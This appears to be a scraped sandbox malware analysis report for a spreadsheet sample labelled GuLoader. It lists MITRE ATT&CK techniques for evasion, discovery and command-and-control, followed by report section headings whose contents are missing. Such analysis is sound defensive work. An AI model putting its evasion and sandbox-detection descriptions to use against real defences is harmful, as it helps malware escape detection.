Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ORDER RFQ1009202.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 2012 Parent PID: 596

General